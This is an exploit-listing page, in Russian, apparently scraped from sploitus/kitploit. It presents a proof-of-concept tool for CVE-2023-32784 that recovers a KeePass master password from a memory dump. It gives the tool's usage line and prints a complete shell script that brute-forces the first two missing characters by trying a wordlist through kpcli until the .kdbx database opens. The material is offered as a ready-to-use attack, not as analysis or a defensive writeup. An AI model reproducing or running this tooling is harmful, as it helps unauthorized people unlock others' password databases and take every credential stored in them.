## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DAWNL3SS-CVE-2023-32784
# keepass-dump-masterkey
## Использование
`python3 poc.py <PathToDmp>`
## Предварительный просмотр

Напоминаем: первый символ не может быть найден в дампе, а для второго скрипт выдаст лишь несколько возможных вариантов. В любом случае рекомендуем запустить брутфорс по 2 символам с помощью скрипта ниже
root@kitploit:~
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
echo "Using password: \"$i\""
echo "$i" | kpcli --kdb=$1 && exit 0
done < $2
> Этот скрипт отлично работает на физической машине, но на виртуальных машинах он, похоже, нестабилен
Кстати: скрипт на Python, представленный в этом проекте, следует за прочтением следующего проекта: https://github.com/vdohney/keepass-password-dumper